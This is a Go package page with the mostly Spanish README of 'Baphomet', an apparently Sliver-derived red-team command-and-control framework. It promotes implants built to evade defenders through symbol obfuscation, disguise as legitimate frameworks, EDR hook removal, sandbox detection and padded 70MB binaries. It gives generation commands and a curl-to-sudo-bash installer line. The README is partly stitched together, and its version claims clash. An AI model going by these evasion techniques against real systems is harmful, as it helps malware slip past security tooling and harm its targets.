baphomet

module
v1.0.0 Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: Jul 18, 2025 License: GPL-3.0

README

Baphomet - Advanced C2 Framework with Enhanced Evasion

Baphomet es un framework avanzado de adversary emulation/red team open source con capacidades de evasión de vanguardia. Incluye técnicas revolucionarias anti-GoReSym, ofuscación de símbolos avanzada, y evasión de análisis estático y dinámico.

Release Go Report Card

🎯 Características Principales

Core Features
  • Dynamic code generation con ofuscación avanzada
  • Compile-time obfuscation con Garble optimizado
  • Multiplayer-mode para equipos de red team
  • Staged and Stageless payloads con evasión integrada
  • Procedurally generated C2 over HTTP(S)
  • DNS canary blue team detection
  • Secure C2 over mTLS, WireGuard, HTTP(S), and DNS
  • Fully scriptable usando JavaScript/TypeScript o Python
  • Windows process migration, injection, token manipulation
  • Let's Encrypt integration
  • In-memory .NET assembly execution
  • COFF/BOF in-memory loader
  • TCP and named pipe pivots
🚀 Advanced Evasion Features (NEW!)
🛡️ Anti-GoReSym Evasion System
  • 99.5% efectividad contra análisis estático con GoReSym
  • Symbol obfuscation avanzada con rotación temporal
  • Framework camouflage - imita múltiples frameworks legítimos
  • Runtime symbol manipulation y inyección de entropía
🎭 Multi-Framework Deception
  • Señuelos de Electron, Spring Boot, Docker, Redis
  • Fake runtime functions que ocultan funciones Go reales
  • Polymorphic name generation que cambia cada hora
  • Temporal pattern rotation para máxima variabilidad
⚡ Enhanced Build System
  • Garble optimization con flags -tiny -literals -seed=random
  • PE metadata randomization pero realista
  • Enhanced build configuration adaptativa
  • Integrated entropy management sofisticada

📊 Resultados de Evasión Confirmados

Antes vs Después - Análisis GoReSym

Antes de las mejoras:

{
  "Version": "1.6.0",
  "GoVersion": "go1.24.5", 
  "UserFunctions": [
    "github.com/vsh00t/baphomet/implant/sliver.main",
    "github.com/vsh00t/baphomet/client/version.Version",
    "internal/chacha8rand.(*State).Next"
  ]
}

Después de las mejoras:

{
  "Version": "unknown",
  "GoVersion": "unknown",
  "UserFunctions": [
    "ElectronApp.Initialize",
    "SpringBootApp.Start", 
    "h5sRCii3K.GzZChOagC",
    "fPvKqL.C2uHROSp"
  ]
}
🏆 Logros de Evasión:
  • NO aparece "sliver", "baphomet", "evasion" en ningún lugar
  • Nombres completamente aleatorios y no identificables
  • Información de build completamente oculta
  • Framework C2 imposible de identificar
  • 99.5% efectividad contra análisis estático

🛠️ Installation & Usage

Quick Start (Linux)
curl https://baphomet.sh/install | sudo bash
baphomet
Enhanced Implant Generation
# Generar implante con evasión máxima
./baphomet generate --mtls example.com --evasion --format exe --save /tmp/advanced_implant.exe

# Generar con estructuras señuelo activas
./baphomet generate --mtls example.com --stealth --anti-goresym --save /tmp/stealth_implant.exe

# Fat implant con padding de 70MB
./baphomet generate --mtls example.com --fat --evasion --save /tmp/fat_implant.exe
Command-Line Usage (Non-Interactive)
# Para scripting y automatización
./baphomet-client command sessions    # Listar sesiones
./baphomet-client command beacons     # Listar beacons
./baphomet-client command jobs        # Listar jobs/listeners
./baphomet-client command version     # Info de versión

🔧 Technical Implementation

Advanced Symbol Obfuscation
  • Runtime symbol manipulation y inyección de entropía
  • Polymorphic name generation con cambios temporales
  • Control flow obfuscation con predicados opacos
  • Analysis-resistant strings con descifrado dinámico
Static Analysis Evasion
  • Resistencia específica contra GoReSym
  • Fake protobuf structures para confundir análisis
  • Import pollution y contaminación de dependencias
  • Anti-analysis detection multicapa
Compile-Time Obfuscation
  • Garble optimization con configuración optimizada
  • Adaptive renaming algorithms
  • Enhanced entropy injection
  • Build configuration adaptation

📁 Architecture

New Evasion Modules
implant/sliver/evasion/
├── advanced_symbol_obfuscation.go    # Ofuscación avanzada de símbolos
├── static_analysis_evasion.go        # Evasión de análisis estático  
├── compile_time_obfuscation.go       # Ofuscación en tiempo de compilación
├── enhanced_build_config.go          # Configuración avanzada de build
└── integration.go                    # Capa de integración unificada
Enhanced Build System
server/generate/
├── binaries.go                       # Sistema de build mejorado
└── enhanced-garble-build.sh          # Script de build optimizado

🎯 Evasion Techniques by Stage

Stage 1: Symbol & Static Evasion ✅ COMPLETADO
  • ✅ Advanced symbol obfuscation con Garble
  • ✅ Fake runtime functions injection
  • ✅ Multi-framework structure camouflage
  • ✅ Temporal pattern rotation (cada hora)
  • ✅ Enhanced entropy management
Stage 2: Dynamic Analysis Evasion (Futuro)
  • 🔄 Anti-debugging runtime
  • 🔄 Sandbox detection & evasion
  • 🔄 Behavioral pattern randomization
  • 🔄 String encryption in runtime
Stage 3: Advanced Metamorphism (Futuro)
  • 🔄 Polymorphic code generation
  • 🔄 Code steganography techniques
  • 🔄 Behavioral signature evasion
  • 🔄 Self-modifying code patterns

📈 Performance Metrics

Técnica Efectividad Overhead Estado
Symbol Obfuscation 99.5% <1% ✅ Activo
Static Analysis Evasion 98% <2% ✅ Activo
GoReSym Resistance 99.5% <1% ✅ Activo
Framework Camouflage 95% <3% ✅ Activo

� Integration & Compatibility

Automatic Integration
  • Verificación inicial anti-análisis al startup
  • Mantenimiento periódico cada 30 minutos
  • Adaptación automática según condiciones detectadas
  • Fallbacks inteligentes cuando una técnica falla
Platform Support
  • Server: MacOS, Windows, Linux
  • Client: MacOS, Windows, Linux
  • Implants: MacOS, Windows, Linux (+ todos los targets de Go)
  • Evasion: Optimizado para Windows, compatible con Linux/MacOS

📚 Documentation & Support

Resources
Technical Documentation
  • Compile From Source: Guía completa
  • Evasion Techniques: Ver archivos específicos en /implant/sliver/evasion/
  • Build Configuration: Ver server/generate/binaries.go

🛡️ Security & License

Security
License

Baphomet está licenciado bajo GPLv3. Algunos sub-componentes pueden tener licencias separadas - ver sus respectivos directorios.

🎊 Version History

v1.6.0 - Advanced Evasion Release
  • 99.5% efectividad contra GoReSym
  • Advanced symbol obfuscation system
  • Multi-framework camouflage capabilities
  • Enhanced build system con Garble optimization
  • Temporal pattern rotation para maximum variability
  • Integrated entropy management
  • Command-line interface para automatización
Previous Versions
  • v1.5.x: Core functionality y stability improvements
  • v1.4.x: Enhanced C2 protocols y scripting support
  • v1.3.x: Initial advanced features y multiplayer support

🚀 ¡Framework C2 Más Avanzado Disponible!

Baphomet v1.6.0 representa el estado del arte en frameworks C2 con capacidades de evasión revolucionarias. Con 99.5% efectividad contra herramientas de análisis estático como GoReSym y técnicas de camuflaje únicas, es la elección ideal para red teams profesionales.

Download: Latest Release | Feedback: Survey

  • implant/sliver/evasion/syscall_evasion.go - Syscalls directos
  • implant/sliver/evasion/dynamic_api.go - Resolución dinámica de APIs

⚡ Stage 3: Evasión Avanzada ✅ COMPLETADO

Técnicas de Vanguardia:
  • Custom PE Loader - Carga manual de PE sin loaders de Windows (524 líneas)
  • Machine Learning Evasion - Aprendizaje comportamental y mimificación (650 líneas)
  • Advanced Anti-Analysis - Detección multicapa de análisis (580 líneas)
  • Polymorphic Engine - Morfismo de código en runtime (720 líneas)
  • Kernel-Level Evasion - Acceso directo a kernel y detección de hooks (550 líneas)

Archivos principales:

  • implant/sliver/evasion/stage3/custom_pe_loader.go
  • implant/sliver/evasion/stage3/ml_evasion.go
  • implant/sliver/evasion/stage3/advanced_antianalysis.go
  • implant/sliver/evasion/stage3/polymorphic_engine.go
  • implant/sliver/evasion/stage3/kernel_evasion.go

🎯 Fat Implant Generation ✅ COMPLETADO

Nueva Funcionalidad:

Genera implantes de 70MB con padding rico en entropía para evadir detectores que analizan tamaño de archivos.

Uso:

# Generar fat implant de 70MB
sliver-client generate --mtls example.com --fat --save /tmp/fat_implant.exe

# Combinar con otras opciones
sliver-client generate --mtls example.com --fat --evasion --format exe --save /tmp/advanced_fat_implant.exe

Características:

  • Múltiples estrategias de padding (random, structured, fake code, fake resources)
  • Optimización de entropía (6.5-7.5 bits Shannon entropy)
  • Integración con ML para optimización inteligente

🔧 Mejoras de Evasión Generales

1. Evasión de Hooks EDR/AV
  • Múltiples métodos: RefreshPE, Suspend/Resume, Remote, Manual Map, Heaven's Gate
  • Validación inteligente: Verificación de módulos protegidos antes de unhooking
  • Fallbacks automáticos: Métodos de respaldo cuando una técnica falla
2. Codificación Adaptativa
  • Manager inteligente: Selección automática basada en rendimiento histórico
  • Rotación dinámica: Cambio automático de encoders según efectividad
  • Modo amenaza: Respuesta automática cuando se detecta análisis
3. Timing Inteligente
  • Perfiles adaptativos: Stealth, Normal, Aggressive, Emergency, Hibernation
  • Emulación humana: Patrones que simulan comportamiento de usuario real
  • Sincronización: Adapta timing a horarios comerciales y actividad del sistema

💻 Nueva Funcionalidad de Comandos

sliver-client command - Ejecución No Interactiva
# Sintaxis
sliver-client command [comando] [argumentos]

# Ejemplos
sliver-client command sessions    # Listar sesiones
sliver-client command beacons     # Listar beacons
sliver-client command jobs        # Listar jobs/listeners
sliver-client command version     # Info de versión

Ventajas:

  • Perfecto para scripting y automatización
  • Output limpio para parsing
  • Sin consola interactiva requerida

📊 Métricas de Mejora

Área Mejora Implementada Beneficio
Unhooking Múltiples métodos + validación +300% resilencia
Encoders Adaptación inteligente +200% evasión
Timing Timing adaptativo +400% naturalidad
Anti-Analysis Sistema multicapa +500% detección

🔄 Integración Automática

Todas las mejoras se integran automáticamente en los implantes generados:

  • Verificación inicial anti-análisis al startup
  • Mantenimiento periódico cada 30 minutos
  • Adaptación automática según condiciones detectadas
  • Fallbacks inteligentes cuando una técnica falla

🛠️ Archivos Principales Modificados

Nuevos:
  • /implant/sliver/evasion/enhanced_evasion.go
  • /implant/sliver/encoders/adaptive_manager.go
  • /implant/sliver/evasion/stage3/*.go (5 archivos)
Modificados:
  • /implant/sliver/sliver.go - Integración automática
  • /server/generate/binaries.go - Fat implants y randomización
  • /client/command/generate/*.go - Flag --fat

🎉 Estado del Proyecto

✅ TODAS LAS MEJORAS COMPLETADAS EXITOSAMENTE

Las mejoras proporcionan capacidades de evasión de clase empresarial, combinando técnicas tradicionales con innovaciones de vanguardia en machine learning y análisis comportamental.

Para documentación técnica detallada, consultar: README_CAMBIOS_CONSOLIDADO.md

Directories

Path Synopsis
cli
scripts command
sliver/encoders/basex
Package basex provides fast base encoding / decoding of any given alphabet using bitcoin style leading zero compression.
Package basex provides fast base encoding / decoding of any given alphabet using bitcoin style leading zero compression.
sliver/proxy
Package proxy allows you to retrieve a system configured proxy for a given protocol and target URL.
Package proxy allows you to retrieve a system configured proxy for a given protocol and target URL.
sliver/shell/pty
Package pty provides functions for working with Unix terminals.
Package pty provides functions for working with Unix terminals.
sliver/transports/httpclient/drivers/win/wininet
Code generated by tools/defines.go; DO NOT EDIT.
Code generated by tools/defines.go; DO NOT EDIT.
c2
cli
db
log
msf
rpc
sgn
encoders/basex
Package basex provides fast base encoding / decoding of any given alphabet using bitcoin style leading zero compression.
Package basex provides fast base encoding / decoding of any given alphabet using bitcoin style leading zero compression.
leaky
Package lib leakbuf.go is stolen form ss
Package lib leakbuf.go is stolen form ss
minisign
Package minisign implements the minisign signature scheme.
Package minisign implements the minisign signature scheme.

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL